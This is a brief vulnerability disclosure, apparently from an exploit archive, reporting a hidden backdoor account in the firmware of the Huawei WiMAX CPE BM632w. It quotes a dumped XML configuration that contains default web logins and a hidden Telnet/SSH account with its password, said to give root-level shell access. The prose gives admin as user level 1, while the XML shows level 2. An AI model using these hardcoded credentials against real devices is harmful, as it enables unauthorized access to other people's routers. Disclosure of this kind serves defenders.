Exploit Title : Huawei Wimax CPE Bm632w Hidden Backdoor
Date : 30 May 2015
Exploit Author : Koorosh Ghorbani
Site : http://8thbit.net/
Vendor Homepage : http://www.huawei.com/
Platform : Hardware
Tested On : Mobinnet : Huawei Wimax CPE bm632w
Firmware Version: V100R001IRNC15B015
________________________________________________________


binwalk result shows firmware have a xml configuration file , in this file there is a user with User Level = 0 , so it Means Super Admin because the
admin has user level = 1 so , Huawei Wimax CPE BM632w upgrade firmware with version : V100R001IRNC15B015 Have hidden user with UserLevel = 0 which cant login with web panel but it has full ATP Access on Telnet and SSH. in ATP shell , after typing "shell" Command , Busybox shell will Appears . here is part of dumped xml file .

<UserInterface>
<X_Web Timeout="5" FirstLogin="1">
<UserInfo NumberOfInstances="2">
<UserInfoInstance InstanceID="1"  Username="admin" Userpassword="admin" UserLevel="2">
<ObjExtention>
<Userpassword HideBits="27"/>
</ObjExtention>
</UserInfoInstance>
<UserInfoInstance InstanceID="2"  Username="user" Userpassword="user" Userlevel="1">
<ObjExtention>
<Userpassword HideBits="27"/>
</ObjExtention>
</UserInfoInstance>
</UserInfo>
</X_Web>
<X_Cli>
<UserInfo NumberOfInstances="1">
<UserInfoInstance InstanceID="1"  Username="wimax" Userpassword="wimax820" Userlevel="0"/>
</UserInfo>
</X_Cli>
</UserInterface>